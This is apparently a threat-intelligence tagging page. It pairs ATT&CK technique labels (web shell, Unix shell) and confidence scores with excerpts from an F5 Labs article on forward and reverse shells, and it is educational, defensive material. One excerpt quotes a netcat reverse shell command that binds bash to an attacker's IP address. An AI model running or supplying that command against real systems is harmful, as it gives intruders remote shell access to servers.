F5 Labs
Forward and Reverse Shells
ATT&CK techniques detected
T1505.003Web Shell
98%
“forward and reverse shells introduction once attackers have gained a foothold, perhaps by exploiting a remote code execution ( rce ) vulnerability, leveraging a file upload, or some other tactic to gain execution on the target, they may end up using a web shell, as we described i…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
91%
“tools they can use to create reverse shells, and it ’ s likely that at least one of these will be present on the target. reverse shells can be created with the following tools, among many others ( this list is not exhaustive ) : - bash - sh ( this will be present on every linux s…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
49%
“target “ nc 192. 168. 0. 2 80 - e / bin / bash ” the nc command will create a network connection from the webserver to the attacker machine and then connect the linux shell “ bash ” to this network connection. on the attacker machine, the listener on the attacker machine now is c…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Learn how attackers use server initiated connections and other clever tricks to deliver shells to attackers, circumventing inbound firewalls and access controls.